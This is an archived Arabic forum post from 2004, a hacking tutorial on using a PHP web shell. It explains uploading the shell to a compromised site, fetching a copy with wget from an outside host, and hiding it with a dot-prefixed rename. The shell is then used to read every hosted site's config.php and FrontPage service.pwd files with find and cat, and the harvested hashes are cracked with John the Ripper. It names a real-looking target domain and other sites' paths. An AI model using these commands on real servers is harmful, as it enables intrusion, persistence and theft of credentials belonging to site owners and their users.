الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

طريقة احتراف السكربت php مع الملك المدمر

مغلق
بدأه الملك المدمر في 21 أكتوبر 2004 · 0 رد · 1,997 مشاهدة · في منتدى تطوير المواقع بـ PHP
مشاركة: واتساب X فيسبوك تيليجرام
#1

اخواني موضوعي اليوم هو شرح و تطبيق و احتراف استخدام السكربت phpshell قد يكون قديم نوع ما و لكن هناك الكثير للاسف يجهله و انا اتمنى بعد هذا الشرح ان اقوم بسد ثغرات كثيرة لدى الجميع و يكتسبوا معلومات عن هذا السكربت.

البي اتش بي شل (phpshell) هو سكربت بلغة الـphp

وعند رفع هذا السكربت على اي سيرفر تستطيع تطبيق اوامر الينكس

ومن الأوامر تستطيع معرفت جميع المواقع على السيرفر وقراءة ملف الـconfig

للمواقع الموجوده على السيرفر يعني انت اذا اخترقت موقع عن طريق اي ثغره

تحمل على الموقع هذا السكربت وتجعله في ملف مخفي على السيرفر وتروح لمسار

السكربت يعني لو كان الموقع www.israel.org وانت حملت السكربت على ملف mail

وكان اسم السكربت phpshell.php بيكون بطريقه هذي

www.israel.org/mail/phpshell.php

وطبقت الأوامر عليه راااااح تملك كامل السيرفر بس اذا ما كاا مفعل السيف مود(safe mode)

رااااااح تكتشف هذي الأسرااااااار اذا طبقت الأوامر.....

cat /home/*/public_html/_vti_pvt/service.pwd

cat /home/*/public_html/_vti_pvt/access.cnf

cat /home/*/public_html/vb/admin/config.php

cat /home/*/public_html/phpbb/config.php

cat /home/*/public_html/forum/config.php

/usr/home/*/www/vb/admin/config.php

------------------

الي ابي اوضحه انه مو دائما تنفع هذي الاوامر راح تقولون لي ليش ؟؟ بقلكم لانه كل سيرفر وله تقسيمه الخاص فيه

طيب بشرح لكم كيف تسحب الملفات اذا ماوجدتوها بالاوامر الي حطها الاخ ياهوووو ...

بس قبل ماشرح ابي اوضح نقطة مهمة جدا

الي هي كيف تخفي سكربت الـ PHP SHELL عن النظر من الموقع عشان لا يشك صاحب الموقع ويحذفه لك ...

اوكي نبدأ الحين :

أول شيء تسويه تسحب من موقعك شيل من الشيل الي انت فيه بالطريقة هذي www.xxxx.com/11.php wget

الحين لازم أغير اسم الشيل عشان أخفيه بالطريقة هذي Mv 11.php .11.php

ملاحظين وش أضفنا اضفنا نقطة عشان يصير مخفي ولو حذف الاول الي محمله يكون معاك واحد مخفي ...

طيب الحين نرجع لموضوعنا الأول ( كيف نسحب : قواعد البيانات - المواقع - الباسوردات )

أولا نبدأ بالاسهل قواعد البيانات وتكون الباسوردات ماهي مشفرة : ونكتب هذا الأمر :

find / -name config.php

الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :

usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php

usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php

usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php

طيب نبي نقرأ المكتوب بداخل الملف نكتب هذا الأمر :

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php

راح يطلع لك ملف الكونفيج وفيه مكتوب اليوسر نيم والباسورد تبع قاعدة البيانات

طبعا الكل يعرف الـ phpBB انه قاعدة بيانات للمنتدى ... طيب الحين عندك اليوسر والباس جاهز على طول راح تشبك ببرنامج

MySQL-Front_2.5_Setup وعاد بعدين انت وراسك ...

طيب الحين نبي نطلع باسوردات الموقع وهي اكيد راح تكون مشفرة

طبعا الكل يعرف ثغرة الفرونت بيج vti_pvt/service.pwd الحين راح نكتب الامر نستدعي كل ملفات الباسورد الي على السيرفر :

find / -name service.pwd

وراح يطلع لك بالشكل هذا :

usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd

اوكي الحين مثلا ابي استعرض باسورد هذا الموقع :

usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

راح اكتب هذا الامر :

cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd

راح يجيك الباسورد مشفر طبعا راح تفكه ببرنامج JHON THE RIPPER

(*_*) منقوووول مع الملك المدمر (*_*)

إن شاء الله أكون وفقت في الشرح ... والجميع يكون استوعب الدرس البسيط

mido_hack_2003@hotmail.com

هذا الموضوع مغلق.

مواضيع مشابهة

عدد الزوار حالياً

المتواجدون خلال آخر دقيقتين · يتحدّث كل ٣٠ ثانية

—الإجمالي—أعضاء مسجّلون—زوار بدون تسجيل

جارٍ التحقق من المتواجدين…